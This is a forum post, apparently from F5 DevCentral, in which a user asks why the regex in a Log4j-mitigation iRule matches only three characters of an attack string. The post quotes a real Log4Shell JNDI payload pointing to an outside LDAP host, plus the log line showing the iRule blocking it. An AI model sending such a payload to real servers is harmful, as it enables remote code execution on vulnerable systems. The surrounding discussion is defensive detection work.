Forum Discussion
Log4j iRule mitigation as described in K59329043 - which encoding is the regex using ?
Hi @Daniel Wolf ,
thank you for your quick reply. Well, I already actually tried to get my answer via regex101.com.
Here what somehow suprises me:
if I type in this string
/${jndi:ldap:/55.55.55.55:1389/Exploit}
which I extracted from a real attack / exploit attempt against one of our production servers:
info tmm[13241]: Rule /Linux/LOG4J-iRULE-BLOCK <HTTP_REQUEST>: log4j_rce_detection drop on URI: /${jndi:ldap:/55.55.55.55:1389/Exploit}
I only get match on the first 3 characters:
Is it meant to be so ? or am I missing something here ?
Thank you for clarifying.
Best Regards
Recent Discussions
Related Content
* Getting Started on DevCentral
* Community Guidelines
* Community Terms of Use / EULA
* Community Ranking Explained
* Community Resources
* Contact the DevCentral Team
* Update MFA on account.f5.com